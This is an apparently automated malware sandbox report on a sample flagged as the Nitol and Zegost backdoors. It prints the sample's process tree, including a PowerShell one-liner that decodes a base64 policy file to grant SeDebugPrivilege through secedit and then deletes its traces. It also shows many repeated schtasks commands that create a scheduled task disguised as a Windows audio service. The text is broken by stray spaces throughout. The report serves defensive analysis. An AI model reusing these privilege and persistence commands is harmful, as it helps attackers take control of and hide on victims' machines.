powershell .exe -NoPr ofile -C " [IO.File]: :WriteAllB ytes([IO.P ath]::Comb ine($env:T EMP, 'SeDe bugPrivile ge4.inf'), [Convert] ::FromBase 64String(' //5bAFUAbg BpAGMAbwBk AGUAXQANAA oAVQBuAGkA YwBvAGQAZQ A9AHkAZQBz AA0ACgBbAF YAZQByAHMA aQBvAG4AXQ ANAAoAcwBp AGcAbgBhAH QAdQByAGUA PQAiACQAQw BIAEkAQwBB AEcATwAkAC IADQAKAFIA ZQB2AGkAcw BpAG8AbgA9 ADEADQAKAF sAUAByAGkA dgBpAGwAZQ BnAGUAIABS AGkAZwBoAH QAcwBdAA0A CgBTAGUARA BlAGIAdQBn AFAAcgBpAH YAaQBsAGUA ZwBlACAAPQ AgACoAUwAt ADEALQA1AC 0AMQA4AA0A CgA=')); s ecedit.exe /configur e /db ([IO .Path]::Co mbine($env :TEMP, 'Se DebugPrivi lege4.sdb' )) /cfg ([ IO.Path]:: Combine($e nv:TEMP, ' SeDebugPri vilege4.in f')) /over write /log ([IO.Path ]::Combine ($env:TEMP , 'SeDebug Privilege4 .log')) /q uiet; Remo ve-Item -P ath ([IO.P ath]::Comb ine($env:T EMP, 'SeDe bugPrivile ge4.*')) - Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7764 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - SecEdit.exe (PID: 8156 cmdline:
"C:\Window s\system32 \SecEdit.e xe" /confi gure /db C :\Users\us er\AppData \Local\Tem p\SeDebugP rivilege4. sdb /cfg C :\Users\us er\AppData \Local\Tem p\SeDebugP rivilege4. inf /overw rite /log C:\Users\u ser\AppDat a\Local\Te mp\SeDebug Privilege4 .log /quie t MD5: BFC13856291E4B804D33BBAEFC8CB3B5) - cmd.exe (PID: 7304 cmdline:
cmd.exe /c schtasks. exe /creat e /tn "Win dows Audio Endpoint Builder( )" /xm l "C:\Prog ramData\Mi crosoft\Mi crosoftNet Framework. xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6984 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 7220 cmdline:
schtasks.e xe /create /tn "Wind ows Audio Endpoint B uilder( )" /xml "C:\Progr amData\Mic rosoft\Mic rosoftNetF ramework.x ml MD5: 48C2FE20575769DE916F48EF0676A965) - conhost.exe (PID: 7228 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 5684 cmdline:
cmd.exe /c schtasks. exe /creat e /tn "Win dows Audio Endpoint Builder( )" /xm l "C:\Prog ramData\Mi crosoft\Mi crosoftNet Framework. xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7412 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 640 cmdline:
schtasks.e xe /create /tn "Wind ows Audio Endpoint B uilder( )" /xml "C:\Progr amData\Mic rosoft\Mic rosoftNetF ramework.x ml MD5: 48C2FE20575769DE916F48EF0676A965) - cmd.exe (PID: 7552 cmdline:
cmd.exe /c schtasks. exe /creat e /tn "Win dows Audio Endpoint Builder( )" /xm l "C:\Prog ramData\Mi crosoft\Mi crosoftNet Framework. xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7572 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 4632 cmdline:
schtasks.e xe /create /tn "Wind ows Audio Endpoint B uilder( )" /xml "C:\Progr amData\Mic rosoft\Mic rosoftNetF ramework.x ml MD5: 48C2FE20575769DE916F48EF0676A965) - cmd.exe (PID: 6408 cmdline:
cmd.exe /c schtasks. exe /creat e /tn "Win dows Audio Endpoint Builder( )" /xm l "C:\Prog ramData\Mi crosoft\Mi crosoftNet Framework. xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5836 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - conhost.exe (PID: 7832 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 6224 cmdline:
schtasks.e xe /create /tn "Wind ows Audio Endpoint B uilder( )" /xml "C:\Progr amData\Mic rosoft\Mic rosoftNetF ramework.x ml MD5: 48C2FE20575769DE916F48EF0676A965) - cmd.exe (PID: 7684 cmdline:
cmd.exe /c schtasks. exe /creat e /tn "Win dows Audio Endpoint Builder( )" /xm l "C:\Prog ramData\Mi crosoft\Mi crosoftNet Framework. xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6076 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 7768 cmdline:
schtasks.e xe /create /tn "Wind ows Audio Endpoint B uilder( )" /xml "C:\Progr amData\Mic rosoft\Mic rosoftNetF ramework.x ml MD5: 48C2FE20575769DE916F48EF0676A965) - cmd.exe (PID: 2960 cmdline:
cmd.exe /c schtasks. exe /creat e /tn "Win dows Audio Endpoint Builder( )" /xm l "C:\Prog ramData\Mi crosoft\Mi crosoftNet Framework. xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5580 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 3412 cmdline:
schtasks.e xe /create /tn "Wind ows Audio Endpoint B uilder( )" /xml "C:\Progr amData\Mic rosoft\Mic rosoftNetF ramework.x ml MD5: 48C2FE20575769DE916F48EF0676A965) - cmd.exe (PID: 2676 cmdline:
cmd.exe /c schtasks. exe /creat e /tn "Win dows Audio Endpoint Builder( )" /xm l "C:\Prog ramData\Mi crosoft\Mi crosoftNet Framework. xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 8164 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 4256 cmdline:
schtasks.e xe /create /tn "Wind ows Audio Endpoint B uilder( )" /xml "C:\Progr amData\Mic rosoft\Mic rosoftNetF ramework.x ml MD5: 48C2FE20575769DE916F48EF0676A965) - conhost.exe (PID: 8168 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7224 cmdline:
cmd.exe /c schtasks. exe /creat e /tn "Win dows Audio Endpoint Builder( )" /xm l "C:\Prog ramData\Mi crosoft\Mi crosoftNet Framework. xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7288 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 7216 cmdline:
schtasks.e xe /create /tn "Wind ows Audio Endpoint B uilder( )" /xml "C:\Progr amData\Mic rosoft\Mic rosoftNetF ramework.x ml MD5: 48C2FE20575769DE916F48EF0676A965) - cmd.exe (PID: 6868 cmdline:
cmd.exe /c schtasks. exe /creat e /tn "Win dows Audio Endpoint Builder( )" /xm l "C:\Prog ramData\Mi crosoft\Mi crosoftNet Framework. xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5048 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 6076 cmdline:
schtasks.e xe /create /tn "Wind ows Audio Endpoint B uilder( )" /xml "C:\Progr amData\Mic rosoft\Mic rosoftNetF ramework.x ml MD5: 48C2FE20575769DE916F48EF0676A965) - cmd.exe (PID: 7432 cmdline:
cmd.exe /c schtasks. exe /creat e /tn "Win dows Audio Endpoint Builder( )" /xm l "C:\Prog ramData\Mi crosoft\Mi crosoftNet Framework. xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7632 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 5372 cmdline:
schtasks.e xe /create /tn "Wind ows Audio Endpoint B uilder( )" /xml "C:\Progr amData\Mic rosoft\Mic rosoftNetF ramework.x ml MD5: 48C2FE20575769DE916F48EF0676A965) - cmd.exe (PID: 7588 cmdline:
cmd.exe /c schtasks. exe /creat e /tn "Win dows Audio Endpoint Builder( )" /xm l "C:\Prog ramData\Mi crosoft\Mi crosoftNet Framework. xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5696 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 2792 cmdline:
schtasks.e xe /create /tn "Wind ows Audio Endpoint B uilder( )" /xml "C:\Progr amData\Mic rosoft\Mic rosoftNetF ramework.x ml MD5: 48C2FE20575769DE916F48EF0676A965) - cmd.exe (PID: 6072 cmdline:
cmd.exe /c schtasks. exe /creat e /tn "Win dows Audio Endpoint Builder( )" /xm l "C:\Prog ramData\Mi crosoft\Mi crosoftNet Framework. xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 4416 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 2952 cmdline:
schtasks.e xe /create /tn "Wind ows Audio Endpoint B uilder( )" /xml "C:\Progr amData\Mic rosoft\Mic rosoftNetF ramework.x ml MD5: 48C2FE20575769DE916F48EF0676A965) - cmd.exe (PID: 1404 cmdline:
cmd.exe /c schtasks. exe /creat e /tn "Win dows Audio Endpoint Builder( )" /xm l "C:\Prog ramData\Mi crosoft\Mi crosoftNet Framework. xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7776 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 6364 cmdline:
schtasks.e xe /create /tn "Wind ows Audio Endpoint B uilder( )" /xml "C:\Progr amData\Mic rosoft\Mic rosoftNetF ramework.x ml MD5: 48C2FE20575769DE916F48EF0676A965) - cmd.exe (PID: 7756 cmdline:
cmd.exe /c schtasks. exe /creat e /tn "Win dows Audio Endpoint Builder( )" /xm l "C:\Prog ramData\Mi crosoft\Mi crosoftNet Framework. xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7496 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 2840 cmdline:
schtasks.e xe /create /tn "Wind ows Audio Endpoint B uilder( )" /xml "C:\Progr amData\Mic rosoft\Mic rosoftNetF ramework.x ml MD5: 48C2FE20575769DE916F48EF0676A965) - cmd.exe (PID: 7884 cmdline:
cmd.exe /c schtasks. exe /creat e /tn "Win dows Audio Endpoint Builder( )" /xm l "C:\Prog ramData\Mi crosoft\Mi crosoftNet Framework. xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7680 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 5040 cmdline:
schtasks.e xe /create /tn "Wind ows Audio Endpoint B uilder( )" /xml "C:\Progr amData\Mic rosoft\Mic rosoftNetF ramework.x ml MD5: 48C2FE20575769DE916F48EF0676A965) - cmd.exe (PID: 7988 cmdline:
cmd.exe /c schtasks. exe /creat e /tn "Win dows Audio Endpoint Builder( )" /xm l "C:\Prog ramData\Mi crosoft\Mi crosoftNet Framework. xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6540 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 4540 cmdline:
cmd.exe /c schtasks. exe /creat e /tn "Win dows Audio Endpoint Builder( )" /xm l "C:\Prog ramData\Mi crosoft\Mi crosoftNet Framework. xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5844 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 6524 cmdline:
cmd.exe /c schtasks. exe /creat e /tn "Win dows Audio Endpoint Builder( )" /xm l "C:\Prog ramData\Mi crosoft\Mi crosoftNet Framework. xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1212 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7180 cmdline:
cmd.exe /c schtasks. exe /creat e /tn "Win dows Audio Endpoint Builder( )" /xm l "C:\Prog ramData\Mi crosoft\Mi crosoftNet Framework. xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7312 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 3924 cmdline:
cmd.exe /c schtasks. exe /creat e /tn "Win dows Audio Endpoint Builder( )" /xm l "C:\Prog ramData\Mi crosoft\Mi crosoftNet Framework. xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6772 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 6760 cmdline:
cmd.exe /c schtasks. exe /creat e /tn "Win dows Audio Endpoint Builder( )" /xm l "C:\Prog ramData\Mi crosoft\Mi crosoftNet Framework. xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- svchost.exe (PID: 6648 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Nitol | No Attribution |
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Zegost | Yara detected Zegost | Joe Security | ||
JoeSecurity_Nitol | Yara detected Nitol | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Zegost | Yara detected Zegost | Joe Security | ||
JoeSecurity_Nitol | Yara detected Nitol | Joe Security | ||
JoeSecurity_Zegost | Yara detected Zegost | Joe Security | ||
JoeSecurity_Nitol | Yara detected Nitol | Joe Security | ||
JoeSecurity_Zegost | Yara detected Zegost | Joe Security | ||
Click to see the 6 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Zegost | Yara detected Zegost | Joe Security | ||
JoeSecurity_Nitol | Yara detected Nitol | Joe Security | ||
JoeSecurity_Zegost | Yara detected Zegost | Joe Security | ||
JoeSecurity_Nitol | Yara detected Nitol | Joe Security | ||
JoeSecurity_Zegost | Yara detected Zegost | Joe Security | ||
Click to see the 11 entries |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |